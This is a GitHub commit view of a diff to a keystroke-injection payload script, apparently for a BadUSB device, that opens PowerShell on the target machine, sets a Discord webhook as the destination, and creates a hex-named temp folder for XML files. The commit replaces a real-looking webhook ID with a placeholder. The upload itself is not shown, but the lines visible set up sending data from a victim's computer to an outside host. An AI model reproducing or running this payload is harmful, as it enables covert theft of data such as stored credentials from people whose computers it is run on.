Replaced webhook on lin 15 with placeholder

This commit is contained in:
UberGuidoZ 2023-01-20 22:32:49 -08:00 committed by GitHub
parent 5b7a46586c
commit 087c19f48a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -12,7 +12,7 @@ ALTSTRING powershell
ENTER
DELAY 2000
REM Save the Discord Webhook Endpoint in an variable.
ALTSTRING $webhookUri = 'https://discord.com/api/webhooks/1065739856799617054/<Your Key>'
ALTSTRING $webhookUri = 'https://discord.com/api/webhooks/<your_webhook_info>'
ENTER
REM Creating a new folder in Temp with random name to store the xml files.
ALTSTRING New-Item -Path $env:temp -Name "476F6F6420426F7921" -ItemType "directory"